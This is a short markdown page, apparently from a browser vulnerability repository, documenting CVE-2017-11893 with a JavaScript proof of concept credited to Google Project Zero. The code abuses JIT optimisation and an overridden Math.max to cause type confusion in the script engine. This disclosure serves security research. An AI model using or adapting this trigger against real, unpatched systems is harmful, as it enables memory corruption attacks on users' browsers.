Skip to content

Latest commit

 

History

History
36 lines (27 loc) · 775 Bytes

CVE-2017-11893.md

File metadata and controls

36 lines (27 loc) · 775 Bytes
Raw

CVE-2017-11893

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

function opt(arr, arr2) {
    arr[0] = 1.1;
    Math.max.apply(Math, arr2);
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1, 2.2, 3.3, 4.4];
    for (let i = 0; i < 10000; i++) {
        opt(arr, [1, 2, 3, 4]);
    }

    Math.max = function () {
        arr[0] = {};
    };

    opt(arr, {});  // can't handle, calls Math.max
    print(arr[0]);
}

main();

Reference